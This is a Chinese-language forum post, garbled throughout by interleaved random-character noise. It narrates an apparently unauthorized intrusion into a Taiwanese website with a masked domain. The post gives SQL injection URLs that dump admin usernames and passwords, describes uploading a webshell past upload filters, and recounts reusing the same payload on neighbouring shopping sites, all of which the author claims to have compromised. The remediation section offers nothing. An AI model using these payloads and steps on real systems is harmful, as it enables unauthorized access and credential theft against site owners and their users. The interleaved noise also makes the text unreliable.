发现一个注入点
+ Y4 Q: T/ f' I3 mhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833893 k* P1 c. R* K8 B) U9 e6 u' U& c
X& @8 J1 {: q
习惯性的加’having1=1--# w" B* ^1 q5 k+ L; E5 D* D" K1 W3 U
& J/ a, w+ g4 F) a- Ohttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
) h- C! a) j. k; D% D2 K+ C0 l1 P" f( E# `, K
0
5 H5 C% g. g* i5 B6 g3 r2 U8 N+ V8 @: [0 X
爆出Diary_A.dl_Title(这时候很激动啊)8 T# J0 c8 O4 y, B6 ?7 O# @$ ^6 L( v
2 d) v; P8 n7 s$ y% r7 ]0 z那么继续
& {' T' N; A* L4 Ahttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—& h! F- u t$ T
0 y# W9 J; L R继续,一直爆下去! Z# u( P! p/ x
* d7 P0 P4 I2 k: {/ j
爆到几个字段和表段 但是没找到需要的管理用户的字段% N `3 k7 k2 M7 P
2 W; e7 {) J6 b2 R+ C2 ~: E
蛋疼了 怎么办 然后去后台登陆页看源码: r ^: M5 P% I1 S! Q+ {
) O# E8 m& ~# {( v
0
0 t0 t% ^- a ?# h: S
( j/ c4 m# N$ }% O e: s' L' MInput name= “ADUID”
9 @8 t' \0 d: c6 F. w2 C6 ]+ M/ eInput name= “ADPWD”6 |, E8 @4 `, a/ B" y' G
! j& q& [8 {: T8 O/ J
很幸运 找到了字段那就继续
8 [5 q N; @- q5 r/ M: c+ n找到之后开始爆用户
- j5 G# u: ^& v) ghttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—2 g' Y# S( b* {) `4 j8 ^
爆密码; @6 f `; ]0 }/ Z8 D
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
8 {- p+ z; f3 K U测试了下 这个注入点只能爆到文章哪里的表
# q) r+ K/ h! u& m" h- c& b1 G. \ Y% O0 O+ z# ?
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
[; \- o" k( O/ V3 R7 e# \+ h' m3 g$ Y* h: m5 T ^
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
8 A, ~9 O/ U. R
/ k: k/ l) {: o3 W; X473' J0 S$ ^# F* r" I' H% z
2 Z% h/ d) P+ {/ x进后台7 I+ P L" q6 Q
# J" v6 h4 q/ o/ S* l6 ~! C
! N5 {1 M% h/ l9 j- C
发现几个上传点 有的地方不能上传 而且防止恶意代码
1 F! Z. X1 s7 P% |
5 r. G* P; h2 p+ P没办法 各种百度各种找大牛 找到一只好像可以突破的马
/ a: |% y9 W: P( w$ W2 G- |8 @! T1 r8 l' W
. u, c' u6 I2 j: u# I& q
在系统管理那里直接上传 不过没有显示地址5 b& n8 q- u( d T" Z
! D( t9 \7 u7 o: J4 j: W
再上传一次 抓包 搞定OK# t/ }: K2 L2 A5 c. y0 d, x
; _3 n: M" N+ l( n4 X; w" a( Z j# |. O {. O. F
+ A2 ^2 `0 S. R* n8 z
472
, a8 c2 ]& c% s' g2 X5 Y. J1 H1 L/ g
; _, ?3 ?# p; @8 f4 ~9 y晚上不行了 去睡觉。。。
2 f& k- M, l, l: ^! ~2 @* [: F7 i第二天刚起床 闲的没事做继续日站吧 8 P5 x8 c" z9 B& O
, o- k# ~! R& R( y/ Q4 K4 Q找个站 就把这个站的旁c扫了下
5 Y% A% ` p5 F8 \! H4 V$ _( a) o9 U* A1 J* [
发现c段也有一个购物站 ,然后还和这个站的模板差不多# D1 d8 H2 j' j) ^! _
1 J7 K/ {) ^0 Q就找到会员登录口测试
! z6 a* q: ?9 U( c7 i3 ?, L. x1 M4 W) y
'and (select top 1 MGR_UID from A_MGR)>0—, b# N- ]3 \ L
果断爆到了 这时候我很激动 通杀
) T1 A5 _' ]! a) D) Q! z5 g) g5 N J/ z$ ]6 D, w( L
再次翻c段
/ _% I# b2 R d8 r2 t e8 f. b# _. z. M
翻出几个站 都成功拿下# K7 B* k( O) B$ [5 l
! y) C' C6 W. d
9 r! c+ l4 Z- |4 b1 }) p
; M2 B H5 Z' P4 t3 A: G
修复方案:
- J# \) ?: X5 ]& }3 S2 O* I# L他们比我专业
1 k [* \, R5 s- S7 D& y- x* x! o& E+ i1 G+ H( H0 P
* P: D, t: f+ E0 G3 R5 Z, v" e1 u5 v( `
|